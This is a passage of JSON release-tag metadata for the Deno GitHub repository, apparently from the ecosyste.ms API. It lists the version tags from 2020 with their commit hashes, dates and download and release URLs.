v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642c